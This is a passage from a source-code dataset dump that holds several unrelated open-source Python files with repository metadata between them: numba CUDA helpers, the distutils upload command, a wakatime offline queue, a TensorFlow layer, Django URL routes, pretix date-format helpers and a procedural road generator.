s⋅I, for scale s and a d×d identity matrix I.
"""
return self.scale * self._I
def gradient(self):
"""
        Derivative of the covariance matrix with respect to log(s), which is s⋅I.
Returns
-------
logscale : ndarray
s⋅I, for scale s and a d×d identity matrix I.
"""
return dict(logscale=self.value())
def __str__(self):
return format_function(self, {"dim": self._I.shape[0]}, [("scale", self.scale)])
|
mit
| -9,038,107,732,543,751,000
| 20.627451
| 88
| 0.485041
| false
| 3.816609
| false
| false
| false
|
Suwmlee/XX-Net
|
Python3/lib/distutils/command/upload.py
|
1
|
7515
|
"""
distutils.command.upload
Implements the Distutils 'upload' subcommand (upload package to a package
index).
"""
import os
import io
import platform
import hashlib
from base64 import standard_b64encode
from urllib.request import urlopen, Request, HTTPError
from urllib.parse import urlparse
from distutils.errors import DistutilsError, DistutilsOptionError
from distutils.core import PyPIRCCommand
from distutils.spawn import spawn
from distutils import log
class upload(PyPIRCCommand):
description = "upload binary package to PyPI"
user_options = PyPIRCCommand.user_options + [
('sign', 's',
'sign files to upload using gpg'),
('identity=', 'i', 'GPG identity used to sign files'),
]
boolean_options = PyPIRCCommand.boolean_options + ['sign']
def initialize_options(self):
PyPIRCCommand.initialize_options(self)
self.username = ''
self.password = ''
self.show_response = 0
self.sign = False
self.identity = None
def finalize_options(self):
PyPIRCCommand.finalize_options(self)
if self.identity and not self.sign:
raise DistutilsOptionError(
"Must use --sign for --identity to have meaning"
)
config = self._read_pypirc()
if config != {}:
self.username = config['username']
self.password = config['password']
self.repository = config['repository']
self.realm = config['realm']
# getting the password from the distribution
# if previously set by the register command
if not self.password and self.distribution.password:
self.password = self.distribution.password
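    # Hedged illustration (not part of the original module): _read_pypirc()
    # parses credentials from a ~/.pypirc file; a minimal sketch of such a
    # file (server name, URL and credentials are placeholders) looks like:
    #
    #   [distutils]
    #   index-servers = pypi
    #
    #   [pypi]
    #   repository: https://upload.pypi.org/legacy/
    #   username: <your-username>
    #   password: <your-password>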
def run(self):
if not self.distribution.dist_files:
msg = "No dist file created in earlier command"
raise DistutilsOptionError(msg)
for command, pyversion, filename in self.distribution.dist_files:
self.upload_file(command, pyversion, filename)
def upload_file(self, command, pyversion, filename):
# Makes sure the repository URL is compliant
schema, netloc, url, params, query, fragments = \
urlparse(self.repository)
if params or query or fragments:
raise AssertionError("Incompatible url %s" % self.repository)
if schema not in ('http', 'https'):
raise AssertionError("unsupported schema " + schema)
# Sign if requested
if self.sign:
gpg_args = ["gpg", "--detach-sign", "-a", filename]
if self.identity:
gpg_args[2:2] = ["--local-user", self.identity]
spawn(gpg_args,
dry_run=self.dry_run)
# Fill in the data - send all the meta-data in case we need to
# register a new release
f = open(filename,'rb')
try:
content = f.read()
finally:
f.close()
meta = self.distribution.metadata
data = {
# action
':action': 'file_upload',
'protcol_version': '1',
# identify release
'name': meta.get_name(),
'version': meta.get_version(),
# file content
'content': (os.path.basename(filename),content),
'filetype': command,
'pyversion': pyversion,
'md5_digest': hashlib.md5(content).hexdigest(),
# additional meta-data
'metadata_version': '1.0',
'summary': meta.get_description(),
'home_page': meta.get_url(),
'author': meta.get_contact(),
'author_email': meta.get_contact_email(),
'license': meta.get_licence(),
'description': meta.get_long_description(),
'keywords': meta.get_keywords(),
'platform': meta.get_platforms(),
'classifiers': meta.get_classifiers(),
'download_url': meta.get_download_url(),
# PEP 314
'provides': meta.get_provides(),
'requires': meta.get_requires(),
'obsoletes': meta.get_obsoletes(),
}
comment = ''
if command == 'bdist_rpm':
dist, version, id = platform.dist()
if dist:
comment = 'built for %s %s' % (dist, version)
elif command == 'bdist_dumb':
comment = 'built for %s' % platform.platform(terse=1)
data['comment'] = comment
if self.sign:
data['gpg_signature'] = (os.path.basename(filename) + ".asc",
open(filename+".asc", "rb").read())
# set up the authentication
user_pass = (self.username + ":" + self.password).encode('ascii')
# The exact encoding of the authentication string is debated.
        # Anyway PyPI only accepts ascii for both username and password.
auth = "Basic " + standard_b64encode(user_pass).decode('ascii')
# Build up the MIME payload for the POST data
boundary = '--------------GHSKFJDLGDS7543FJKLFHRE75642756743254'
sep_boundary = b'\r\n--' + boundary.encode('ascii')
end_boundary = sep_boundary + b'--\r\n'
body = io.BytesIO()
for key, value in data.items():
title = '\r\nContent-Disposition: form-data; name="%s"' % key
# handle multiple entries for the same name
if not isinstance(value, list):
value = [value]
for value in value:
if type(value) is tuple:
title += '; filename="%s"' % value[0]
value = value[1]
else:
value = str(value).encode('utf-8')
body.write(sep_boundary)
body.write(title.encode('utf-8'))
body.write(b"\r\n\r\n")
body.write(value)
if value and value[-1:] == b'\r':
body.write(b'\n') # write an extra newline (lurve Macs)
body.write(end_boundary)
body = body.getvalue()
msg = "Submitting %s to %s" % (filename, self.repository)
self.announce(msg, log.INFO)
# build the Request
headers = {
'Content-type': 'multipart/form-data; boundary=%s' % boundary,
'Content-length': str(len(body)),
'Authorization': auth,
}
request = Request(self.repository, data=body,
headers=headers)
# send the data
try:
result = urlopen(request)
status = result.getcode()
reason = result.msg
except OSError as e:
self.announce(str(e), log.ERROR)
raise
except HTTPError as e:
status = e.code
reason = e.msg
if status == 200:
self.announce('Server response (%s): %s' % (status, reason),
log.INFO)
else:
msg = 'Upload failed (%s): %s' % (status, reason)
self.announce(msg, log.ERROR)
raise DistutilsError(msg)
if self.show_response:
text = self._read_pypi_response(result)
msg = '\n'.join(('-' * 75, text, '-' * 75))
self.announce(msg, log.INFO)
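# Hedged usage sketch (not part of the original module): with credentials
# configured, the command above is normally driven through setup.py, e.g.
#
#   python setup.py sdist upload
#   python setup.py sdist upload --sign --identity "Jane Packager"
#
# Every dist file recorded in distribution.dist_files is then posted by
# upload_file() as a multipart/form-data request to the configured repository.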
|
bsd-2-clause
| -7,851,997,256,913,855,000
| 35.38806
| 76
| 0.534398
| false
| 4.407625
| true
| false
| false
|
AppVentus/AvTime-client
|
packages/wakatime/wakatime/queue.py
|
1
|
3769
|
# -*- coding: utf-8 -*-
"""
wakatime.queue
~~~~~~~~~~~~~~
Queue for offline time logging.
http://wakatime.com
:copyright: (c) 2014 Alan Hamlett.
:license: BSD, see LICENSE for more details.
"""
import logging
import os
import traceback
from time import sleep
try:
import sqlite3
HAS_SQL = True
except ImportError:
HAS_SQL = False
log = logging.getLogger(__name__)
class Queue(object):
DB_FILE = os.path.join(os.path.expanduser('~'), '.wakatime.db')
def connect(self):
conn = sqlite3.connect(self.DB_FILE)
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS action (
file text,
time real,
project text,
language text,
lines integer,
branch text,
is_write integer,
plugin text)
''')
return (conn, c)
def push(self, data, plugin):
if not HAS_SQL:
return
try:
conn, c = self.connect()
action = {
'file': data.get('file'),
'time': data.get('time'),
'project': data.get('project'),
'language': data.get('language'),
'lines': data.get('lines'),
'branch': data.get('branch'),
'is_write': 1 if data.get('is_write') else 0,
'plugin': plugin,
}
c.execute('INSERT INTO action VALUES (:file,:time,:project,:language,:lines,:branch,:is_write,:plugin)', action)
conn.commit()
conn.close()
except sqlite3.Error:
log.error(traceback.format_exc())
def pop(self):
if not HAS_SQL:
return None
tries = 3
wait = 0.1
action = None
try:
conn, c = self.connect()
except sqlite3.Error:
log.debug(traceback.format_exc())
return None
loop = True
while loop and tries > -1:
try:
c.execute('BEGIN IMMEDIATE')
c.execute('SELECT * FROM action LIMIT 1')
row = c.fetchone()
if row is not None:
values = []
clauses = []
index = 0
for row_name in ['file', 'time', 'project', 'language', 'lines', 'branch', 'is_write']:
if row[index] is not None:
clauses.append('{0}=?'.format(row_name))
values.append(row[index])
else:
clauses.append('{0} IS NULL'.format(row_name))
index += 1
if len(values) > 0:
c.execute('DELETE FROM action WHERE {0}'.format(' AND '.join(clauses)), values)
else:
c.execute('DELETE FROM action WHERE {0}'.format(' AND '.join(clauses)))
conn.commit()
if row is not None:
action = {
'file': row[0],
'time': row[1],
'project': row[2],
'language': row[3],
'lines': row[4],
'branch': row[5],
                        'is_write': True if row[6] == 1 else False,
'plugin': row[7],
}
loop = False
except sqlite3.Error:
log.debug(traceback.format_exc())
sleep(wait)
tries -= 1
try:
conn.close()
except sqlite3.Error:
log.debug(traceback.format_exc())
return action
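# Hedged usage sketch (not part of the original module). Queue persists
# heartbeats in ~/.wakatime.db so they can be re-sent when back online; the
# keys below mirror the columns created in connect(), and the values are
# illustrative only:
#
#   q = Queue()
#   q.push({'file': '/tmp/example.py', 'time': 1400000000.0,
#           'project': 'demo', 'language': 'Python', 'lines': 10,
#           'branch': 'master', 'is_write': True}, plugin='vim-wakatime/4.0.0')
#   action = q.pop()  # oldest queued action as a dict, or None if empty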
|
bsd-3-clause
| -8,956,881,329,862,973,000
| 29.893443
| 124
| 0.439639
| false
| 4.535499
| false
| false
| false
|
cpcloud/numba
|
numba/cuda/nvvmutils.py
|
1
|
5407
|
from __future__ import print_function, absolute_import, division
import itertools
import llvmlite.llvmpy.core as lc
from .cudadrv import nvvm
from numba import cgutils
def declare_atomic_cas_int32(lmod):
fname = '___numba_cas_hack'
fnty = lc.Type.function(lc.Type.int(32),
(lc.Type.pointer(lc.Type.int(32)), lc.Type.int(32), lc.Type.int(32)))
return lmod.get_or_insert_function(fnty, fname)
def declare_atomic_add_float32(lmod):
fname = 'llvm.nvvm.atomic.load.add.f32.p0f32'
fnty = lc.Type.function(lc.Type.float(),
(lc.Type.pointer(lc.Type.float(), 0), lc.Type.float()))
return lmod.get_or_insert_function(fnty, name=fname)
def declare_atomic_add_float64(lmod):
fname = '___numba_atomic_double_add'
fnty = lc.Type.function(lc.Type.double(),
(lc.Type.pointer(lc.Type.double()), lc.Type.double()))
return lmod.get_or_insert_function(fnty, fname)
def declare_atomic_max_float32(lmod):
fname = '___numba_atomic_float_max'
fnty = lc.Type.function(lc.Type.float(),
(lc.Type.pointer(lc.Type.float()), lc.Type.float()))
return lmod.get_or_insert_function(fnty, fname)
def declare_atomic_max_float64(lmod):
fname = '___numba_atomic_double_max'
fnty = lc.Type.function(lc.Type.double(),
(lc.Type.pointer(lc.Type.double()), lc.Type.double()))
return lmod.get_or_insert_function(fnty, fname)
def declare_atomic_min_float32(lmod):
fname = '___numba_atomic_float_min'
fnty = lc.Type.function(lc.Type.float(),
(lc.Type.pointer(lc.Type.float()), lc.Type.float()))
return lmod.get_or_insert_function(fnty, fname)
def declare_atomic_min_float64(lmod):
fname = '___numba_atomic_double_min'
fnty = lc.Type.function(lc.Type.double(),
(lc.Type.pointer(lc.Type.double()), lc.Type.double()))
return lmod.get_or_insert_function(fnty, fname)
def insert_addrspace_conv(lmod, elemtype, addrspace):
addrspacename = {
nvvm.ADDRSPACE_SHARED: 'shared',
nvvm.ADDRSPACE_LOCAL: 'local',
nvvm.ADDRSPACE_CONSTANT: 'constant',
}[addrspace]
tyname = str(elemtype)
tyname = {'float': 'f32', 'double': 'f64'}.get(tyname, tyname)
s2g_name_fmt = 'llvm.nvvm.ptr.' + addrspacename + '.to.gen.p0%s.p%d%s'
s2g_name = s2g_name_fmt % (tyname, addrspace, tyname)
elem_ptr_ty = lc.Type.pointer(elemtype)
elem_ptr_ty_addrspace = lc.Type.pointer(elemtype, addrspace)
s2g_fnty = lc.Type.function(elem_ptr_ty,
[elem_ptr_ty_addrspace])
return lmod.get_or_insert_function(s2g_fnty, s2g_name)
def declare_string(builder, value):
lmod = builder.basic_block.function.module
cval = lc.Constant.stringz(value)
gl = lmod.add_global_variable(cval.type, name="_str",
addrspace=nvvm.ADDRSPACE_CONSTANT)
gl.linkage = lc.LINKAGE_INTERNAL
gl.global_constant = True
gl.initializer = cval
charty = lc.Type.int(8)
constcharptrty = lc.Type.pointer(charty, nvvm.ADDRSPACE_CONSTANT)
charptr = builder.bitcast(gl, constcharptrty)
conv = insert_addrspace_conv(lmod, charty, nvvm.ADDRSPACE_CONSTANT)
return builder.call(conv, [charptr])
def declare_vprint(lmod):
voidptrty = lc.Type.pointer(lc.Type.int(8))
# NOTE: the second argument to vprintf() points to the variable-length
# array of arguments (after the format)
vprintfty = lc.Type.function(lc.Type.int(), [voidptrty, voidptrty])
vprintf = lmod.get_or_insert_function(vprintfty, "vprintf")
return vprintf
# -----------------------------------------------------------------------------
SREG_MAPPING = {
'tid.x': 'llvm.nvvm.read.ptx.sreg.tid.x',
'tid.y': 'llvm.nvvm.read.ptx.sreg.tid.y',
'tid.z': 'llvm.nvvm.read.ptx.sreg.tid.z',
'ntid.x': 'llvm.nvvm.read.ptx.sreg.ntid.x',
'ntid.y': 'llvm.nvvm.read.ptx.sreg.ntid.y',
'ntid.z': 'llvm.nvvm.read.ptx.sreg.ntid.z',
'ctaid.x': 'llvm.nvvm.read.ptx.sreg.ctaid.x',
'ctaid.y': 'llvm.nvvm.read.ptx.sreg.ctaid.y',
'ctaid.z': 'llvm.nvvm.read.ptx.sreg.ctaid.z',
'nctaid.x': 'llvm.nvvm.read.ptx.sreg.nctaid.x',
'nctaid.y': 'llvm.nvvm.read.ptx.sreg.nctaid.y',
'nctaid.z': 'llvm.nvvm.read.ptx.sreg.nctaid.z',
'warpsize': 'llvm.nvvm.read.ptx.sreg.warpsize',
'laneid': 'llvm.nvvm.read.ptx.sreg.laneid',
}
def call_sreg(builder, name):
module = builder.module
fnty = lc.Type.function(lc.Type.int(), ())
fn = module.get_or_insert_function(fnty, name=SREG_MAPPING[name])
return builder.call(fn, ())
class SRegBuilder(object):
def __init__(self, builder):
self.builder = builder
def tid(self, xyz):
return call_sreg(self.builder, 'tid.%s' % xyz)
def ctaid(self, xyz):
return call_sreg(self.builder, 'ctaid.%s' % xyz)
def ntid(self, xyz):
return call_sreg(self.builder, 'ntid.%s' % xyz)
def nctaid(self, xyz):
return call_sreg(self.builder, 'nctaid.%s' % xyz)
    def getdim(self, xyz):
        tid = self.tid(xyz)
        ntid = self.ntid(xyz)
        ctaid = self.ctaid(xyz)
        # global index along this axis: block index * block size + thread index
        res = self.builder.add(self.builder.mul(ntid, ctaid), tid)
        return res
def get_global_id(builder, dim):
sreg = SRegBuilder(builder)
it = (sreg.getdim(xyz) for xyz in 'xyz')
seq = list(itertools.islice(it, None, dim))
if dim == 1:
return seq[0]
else:
return seq
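# Hedged note (not in the original source): per axis the special registers
# combine as  global_id = ctaid * ntid + tid , i.e. block index times block
# size plus thread index.  A sketch of how a lowering routine might call the
# helper above (builder is assumed to be an llvmlite builder positioned
# inside a CUDA kernel):
#
#   gid = get_global_id(builder, dim=1)       # single i32 value
#   gx, gy = get_global_id(builder, dim=2)    # list of two i32 values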
|
bsd-2-clause
| 2,699,991,475,804,289,000
| 32.79375
| 80
| 0.634918
| false
| 2.77852
| false
| false
| false
|
crackhopper/TFS-toolbox
|
tfs/core/layer/fc.py
|
1
|
1671
|
import tensorflow as tf
import numpy as np
from tfs.core.layer import ops as ops
from tfs.core.layer.base import Layer
import tfs.core.initializer.init_func as init
from tfs.core.util import get_arg_dict
class FullyConnect(Layer):
def __init__(self,
net,
outdim,
activation = ops.relu,
name=None,
print_names=['outdim','activation']
):
vtable = get_arg_dict(excludes=['self','net'])
super(FullyConnect,self).__init__(net,**vtable)
def _build(self):
inTensor = self._in
input_shape = inTensor.get_shape()
if input_shape.ndims == 4:
# The input is spatial. Vectorize it first.
dim = np.prod(input_shape.as_list()[1:])
output = tf.reshape(inTensor, [-1,dim])
else:
output, dim = (inTensor, input_shape[-1].value)
weights = self._make_variable('weights', shape=[dim, self.param.outdim],init=init.xavier())
biases = self._make_variable('biases', [self.param.outdim],init=init.constant())
output = tf.nn.xw_plus_b(output, weights, biases,name=self.name)
if self.param.activation:
output= self.param.activation(output, name=self.name)
return output
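  # Hedged note (not in the original source): for a spatial input of shape
  # [batch, 7, 7, 512] the branch above flattens it to [batch, 25088]
  # (7*7*512), so the weight matrix is always built against a 2-D tensor of
  # shape [dim, outdim].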
def _inverse(self):
outTensor = self._inv_in
name = 'inv_'+self.name
act = self.param.activation
if act:
outTensor = act(outTensor)
weights = tf.transpose(self._variables['weights'])
inv_fc = tf.matmul(outTensor,weights)
shape = self._in.get_shape().as_list()
shape[0]=-1
inv_fc = tf.reshape(inv_fc,shape)
print('inv_fc '+str(outTensor.get_shape().as_list()) + '->' + str(inv_fc.get_shape().as_list()))
return inv_fc
|
mit
| 4,118,972,735,694,420,000
| 33.102041
| 100
| 0.630162
| false
| 3.322068
| false
| false
| false
|
raphaelrpl/portal
|
backend/test/recommendation_tests/recommendation_rest_tests.py
|
1
|
3088
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from datetime import datetime, date
from decimal import Decimal
from base import GAETestCase
from recommendation_app.model import Recommendation
from routes.recommendations import rest
from gaegraph.model import Node
from mock import Mock
from mommygae import mommy
class IndexTests(GAETestCase):
def test_success(self):
mommy.save_one(Recommendation)
mommy.save_one(Recommendation)
json_response = rest.index()
context = json_response.context
self.assertEqual(2, len(context))
recommendation_dct = context[0]
self.assertSetEqual(set(['id', 'creation', 'name']), set(recommendation_dct.iterkeys()))
self.assert_can_serialize_as_json(json_response)
class NewTests(GAETestCase):
def test_success(self):
self.assertIsNone(Recommendation.query().get())
json_response = rest.new(None, name='name_string')
db_recommendation = Recommendation.query().get()
self.assertIsNotNone(db_recommendation)
self.assertEquals('name_string', db_recommendation.name)
self.assert_can_serialize_as_json(json_response)
def test_error(self):
resp = Mock()
json_response = rest.new(resp)
errors = json_response.context
self.assertEqual(500, resp.status_code)
self.assertSetEqual(set(['name']), set(errors.keys()))
self.assert_can_serialize_as_json(json_response)
class EditTests(GAETestCase):
def test_success(self):
recommendation = mommy.save_one(Recommendation)
old_properties = recommendation.to_dict()
json_response = rest.edit(None, recommendation.key.id(), name='name_string')
db_recommendation = recommendation.key.get()
self.assertEquals('name_string', db_recommendation.name)
self.assertNotEqual(old_properties, db_recommendation.to_dict())
self.assert_can_serialize_as_json(json_response)
def test_error(self):
recommendation = mommy.save_one(Recommendation)
old_properties = recommendation.to_dict()
resp = Mock()
json_response = rest.edit(resp, recommendation.key.id())
errors = json_response.context
self.assertEqual(500, resp.status_code)
self.assertSetEqual(set(['name']), set(errors.keys()))
self.assertEqual(old_properties, recommendation.key.get().to_dict())
self.assert_can_serialize_as_json(json_response)
class DeleteTests(GAETestCase):
def test_success(self):
recommendation = mommy.save_one(Recommendation)
rest.delete(None, recommendation.key.id())
self.assertIsNone(recommendation.key.get())
def test_non_recommendation_deletion(self):
non_recommendation = mommy.save_one(Node)
response = Mock()
json_response = rest.delete(response, non_recommendation.key.id())
self.assertIsNotNone(non_recommendation.key.get())
self.assertEqual(500, response.status_code)
self.assert_can_serialize_as_json(json_response)
|
mit
| -3,372,677,403,984,990,000
| 38.589744
| 96
| 0.686528
| false
| 3.845579
| true
| false
| false
|
hhauer/myinfo
|
oam_base/urls.py
|
1
|
1496
|
from django.conf.urls import include, url
from django.core.urlresolvers import reverse_lazy
from django.views.generic import RedirectView
from MyInfo import views as my_info_views
from django_cas import views as cas_views
from oam_base import views as base_views
from Duo import views as duo_views
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = [
url(r'^$', my_info_views.index, name='index'),
url(r'^MyInfo/', include('MyInfo.urls', namespace='MyInfo')),
url(r'^AccountPickup/', include('AccountPickup.urls', namespace='AccountPickup')),
url(r'^PasswordReset/', include('PasswordReset.urls', namespace='PasswordReset')),
url(r'^accounts/login/$', cas_views.login, {'next_page': reverse_lazy('AccountPickup:next_step')}, name='CASLogin'),
url(r'^duo/login/$', cas_views.login, name='duoLogin'),
url(r'^accounts/logout/$', cas_views.logout, name='CASLogout'),
url(r'^status/denied/$', base_views.rate_limited, name='rate_limited'),
url(r'^ajax/', include('ajax.urls')),
url(r'^admin/', include(admin.site.urls)),
# Simple redirects for static files that browsers expect to be at the root.
url(r'^robots\.txt$', RedirectView.as_view(url='/static/robots.txt', permanent=True)),
url(r'^favicon\.ico$', RedirectView.as_view(url='/static/favicon.ico', permanent=True)),
url(r'^duo$', duo_views.login, name='duo_login')
]
handler500 = 'oam_base.views.custom_error'
|
mit
| -2,922,288,893,709,480,000
| 39.459459
| 120
| 0.706551
| false
| 3.43908
| false
| false
| false
|
Flamacue/pretix
|
src/pretix/control/utils/i18n.py
|
2
|
2085
|
# Inspired by https://github.com/asaglimbeni/django-datetime-widget/blob/master/datetimewidget/widgets.py
# Copyright (c) 2013, Alfredo Saglimbeni (BSD license)
import re
from django.utils import translation
from django.utils.formats import get_format
from pretix import settings
date_conversion_to_moment = {
'%a': 'ddd',
'%A': 'dddd',
'%w': 'd',
'%d': 'DD',
'%b': 'MMM',
'%B': 'MMMM',
'%m': 'MM',
'%y': 'YY',
'%Y': 'YYYY',
'%H': 'HH',
'%I': 'hh',
'%p': 'a',
'%M': 'mm',
'%S': 'ss',
'%f': 'SSSSSS',
'%z': 'ZZ',
'%Z': 'zz',
'%j': 'DDDD',
'%U': 'ww', # fuzzy translation
'%W': 'WW',
'%c': '',
'%x': '',
'%X': ''
}
moment_locales = {
'af', 'az', 'bs', 'de-at', 'en-gb', 'et', 'fr-ch', 'hi', 'it', 'ko', 'me', 'ms-my', 'pa-in', 'se', 'sr', 'th',
'tzm-latn', 'zh-hk', 'ar', 'be', 'ca', 'de', 'en-ie', 'eu', 'fr', 'hr', 'ja', 'ky', 'mi', 'my', 'pl', 'si', 'ss',
'tlh', 'uk', 'zh-tw', 'ar-ly', 'bg', 'cs', 'dv', 'en-nz', 'fa', 'fy', 'hu', 'jv', 'lb', 'mk', 'nb', 'pt-br', 'sk',
'sv', 'tl-ph', 'uz', 'ar-ma', 'bn', 'cv', 'el', 'eo', 'fi', 'gd', 'hy-am', 'ka', 'lo', 'ml', 'ne', 'pt', 'sl', 'sw',
'tr', 'vi', 'ar-sa', 'bo', 'cy', 'en-au', 'es-do', 'fo', 'gl', 'id', 'kk', 'lt', 'mr', 'nl', 'ro', 'sq', 'ta',
'tzl', 'x-pseudo', 'ar-tn', 'br', 'da', 'en-ca', 'es', 'fr-ca', 'he', 'is', 'km', 'lv', 'ms', 'nn', 'ru', 'sr-cyrl',
'te', 'tzm', 'zh-cn',
}
toJavascript_re = re.compile(r'(?<!\w)(' + '|'.join(date_conversion_to_moment.keys()) + r')\b')
def get_javascript_format(format_name):
f = get_format(format_name)[0]
return toJavascript_re.sub(
lambda x: date_conversion_to_moment[x.group()],
f
)
def get_moment_locale(locale=None):
cur_lang = locale or translation.get_language()
if cur_lang in moment_locales:
return cur_lang
if '-' in cur_lang or '_' in cur_lang:
main = cur_lang.replace("_", "-").split("-")[0]
if main in moment_locales:
return main
return settings.LANGUAGE_CODE
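# Hedged usage sketch (not part of the original module); formats and locales
# below are illustrative only:
#
#   toJavascript_re.sub(...) rewrites a strftime pattern into a moment.js
#   pattern, e.g. '%d.%m.%Y %H:%M' becomes 'DD.MM.YYYY HH:mm', which is what
#   get_javascript_format('DATETIME_INPUT_FORMATS') returns for the first
#   configured input format.
#
#   get_moment_locale('de')           # -> 'de'   (exact match)
#   get_moment_locale('de-informal')  # -> 'de'   (falls back to base language)
#   get_moment_locale('xx')           # -> settings.LANGUAGE_CODE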
|
apache-2.0
| -4,935,072,335,436,854,000
| 31.076923
| 120
| 0.478177
| false
| 2.53034
| false
| false
| false
|
ctogle/make_places
|
mp/make_places/roads.py
|
1
|
33156
|
import make_places.fundamental as fu
import mp_utils as mpu
import mp_bboxes as mpbb
import make_places.primitives as pr
#from make_places.fundamental import element
from make_places.scenegraph import node
from make_places.floors import floor
from make_places.primitives import arbitrary_primitive
from make_places.primitives import ucube
from make_places.primitives import uoctagon
#from make_places.primitives import unit_cube
import make_places.pkler as pk
import os, pdb
import numpy as np
import random as rm
from math import sqrt
from math import cos
from math import sin
from math import tan
from copy import deepcopy as dcopy
cardinal_directions = [
'north', 'northeast',
'east', 'southeast',
'south', 'southwest',
'west', 'northwest']
cardinal_norms = [
[0,1,0],mpu.normalize([1,1,0]),
[1,0,0],mpu.normalize([1,-1,0]),
[0,-1,0],mpu.normalize([-1,-1,0]),
[-1,0,0],mpu.normalize([-1,1,0])]
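# Hedged clarifying note (not in the original source): the two lists above are
# parallel, so cardinal_norms[i] is the unit xy-direction for
# cardinal_directions[i]; for example cardinal_directions.index('northeast')
# is 1 and cardinal_norms[1] is mpu.normalize([1, 1, 0]).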
class vehicle_primitive(arbitrary_primitive):
vehiclexml = os.path.join(pr.primitive_data_path, 'truck.mesh.xml')
#vehicledata = pr.primitive_data_from_xml(vehiclexml)
offset = [0,0,0]
def __init__(self, *args, **kwargs):
pvehdata = pr.primitive_data_from_xml(self.vehiclexml)
#pvehdata = self.vehicledata
arbitrary_primitive.__init__(self, *args, **pvehdata)
self._default_('tag','_vehicle_',**kwargs)
self._scale_uvs_ = False
self.translate(self.offset)
class truck_primitive(vehicle_primitive):
vehiclexml = os.path.join(pr.primitive_data_path, 'truck.mesh.xml')
#vehicledata = pr.primitive_data_from_xml(vehiclexml)
class taxi_primitive(vehicle_primitive):
vehiclexml = os.path.join(pr.primitive_data_path, 'Body.mesh.xml')
#vehicledata = pr.primitive_data_from_xml(vehiclexml)
offset = [0,0,0.5]
class car_batch(node):
possible_vehicles = [truck_primitive,taxi_primitive]
def __init__(self, *args, **kwargs):
self._default_('cargs',[],**kwargs)
self._default_('consumes_children',True,**kwargs)
self._default_('grit_renderingdistance',100,**kwargs)
self._default_('grit_lod_renderingdistance',2000,**kwargs)
self.primitives = self.make_batch(self.cargs)
node.__init__(self, *args, **kwargs)
def make_batch(self, cargs):
cars = []
for cgs in cargs:
new = rm.choice(self.possible_vehicles)()
new.rotate_z(cgs['rotation'][2])
new.translate(cgs['position'])
cars.append(new)
return cars
clip_length = 25
class intersection(node):
def __init__(self, *args, **kwargs):
#self._default_('consumes_children',True,**kwargs)
self._default_('grit_renderingdistance',1000,**kwargs)
self._default_('grit_lod_renderingdistance',2000,**kwargs)
self._default_('tform',self.def_tform(*args,**kwargs),**kwargs)
self._default_('road_width',20,**kwargs)
self._default_('road_height',2,**kwargs)
self.primitives = self.make_segments(*args, **kwargs)
children = self.place_vehicles()
self.add_child(*children)
node.__init__(self, *args, **kwargs)
def find_corners(self):
v1 = [ clip_length, clip_length*tan(fu.to_rad(22.5)),0]
v2 = [ clip_length,-clip_length*tan(fu.to_rad(22.5)),0]
v3 = [-clip_length, clip_length*tan(fu.to_rad(22.5)),0]
v4 = [-clip_length,-clip_length*tan(fu.to_rad(22.5)),0]
v5 = [ clip_length*tan(fu.to_rad(22.5)), clip_length,0]
v6 = [-clip_length*tan(fu.to_rad(22.5)), clip_length,0]
v7 = [ clip_length*tan(fu.to_rad(22.5)),-clip_length,0]
v8 = [-clip_length*tan(fu.to_rad(22.5)),-clip_length,0]
corners = [v1, v2, v3, v4, v5, v6, v7, v8]
return corners
def terrain_points(self):
# i need the location of the octagon verts!
#rh2 = self.road_height/2.0
rh2 = 0.4
corners = self.find_corners()
center = mpu.center_of_mass(corners)
mpu.translate_vector(center,[0,0,-0.5])
corners = mpu.dice_edges(corners, dices = 1)
corners.append(center)
position = self.tform.true().position
x,y,z = position
mpu.translate_coords(corners,[x,y,z-rh2])
return corners
def place_vehicles(self, cnt = 2):
rotz1 = rm.randrange(12) * fu.to_rad(30.0)
rotz2 = rm.randrange(12) * fu.to_rad(30.0)
rotz3 = rm.randrange(12) * fu.to_rad(30.0)
trargs1 = {
'position':[0,0,0],
'rotation':[0,0,rotz1],
}
trargs2 = {
'position':[10,10,0],
'rotation':[0,0,rotz2],
}
trargs3 = {
'position':[-10,-10,0],
'rotation':[0,0,rotz3],
}
trk_batch = car_batch(parent = self,
cargs = [trargs1,trargs2,trargs3])
return [trk_batch]
def make_segments(self, *args, **kwargs):
segs = []
#rw = self.road_width
rh = self.road_height
octang = 22.5
clipln = clip_length
octscl = clipln / cos(fu.to_rad(octang))
uo = uoctagon()
uo.scale([octscl,octscl,rh])
rh = 0.25
uo.translate([0,0,-rh-2.0])
#uo.translate_face([0,0,-rh],'top')
segs.append(uo)
return segs
def get_bbox(self):
corners = self.find_corners()
#corners = [[0,0,0],[50,0,0],[50,50,0],[0,50,0]]
#fu.rotate_z_coords(corners,theta)
position = self.tform.true().position
x,y,z = position
mpu.translate_coords(corners,[x,y,z])
bboxes = [mpbb.bbox(corners = corners)]
#bboxes = [fu.bbox(corners = corners)]
return bboxes
class road_segment_primitive(arbitrary_primitive):
roadxml = os.path.join(pr.primitive_data_path, 'road.mesh.xml')
def __init__(self, *args, **kwargs):
proaddata = pr.primitive_data_from_xml(self.roadxml)
arbitrary_primitive.__init__(self, *args, **proaddata)
self.coords_by_face = self.find_faces()
self.tag = '_road_'
self._scale_uvs_ = False
def find_faces(self):
fronts = [v for v in self.coords if v[1] < 0.0]
backs = [v for v in self.coords if v[1] > 0.0]
lefts = [v for v in self.coords if v[0] < 0.0]
rights = [v for v in self.coords if v[0] > 0.0]
bottoms = [v for v in self.coords if v[2] <= 0.0]
tops = [v for v in self.coords if v[2] > 0.0]
facedict = {
'front':fronts,
'back':backs,
'left':lefts,
'right':rights,
'top':tops,
'bottom':bottoms,
}
return facedict
def translate_face(self, vect, face = 'top'):
cfaces = self.coords_by_face
face_coords = cfaces[face]
mpu.translate_coords(face_coords, vect)
self.calculate_normals()
self.modified = True
def rotate_z_face(self, ang_z, face = 'top'):
cfaces = self.coords_by_face
face_coords = cfaces[face]
foff = mpu.center_of_mass(face_coords)
mpu.translate_coords(face_coords, mpu.flip(foff))
mpu.rotate_z_coords(face_coords, ang_z)
mpu.translate_coords(face_coords, foff)
self.calculate_normals()
self.modified = True
class highway_segment_primitive(road_segment_primitive):
roadxml = os.path.join(pr.primitive_data_path, 'highroad.mesh.xml')
class road(node):
road_prim_type = road_segment_primitive
def __init__(self, *args, **kwargs):
kwargs['uv_scales'] = [1,1,1]
self._default_('uv_tform',
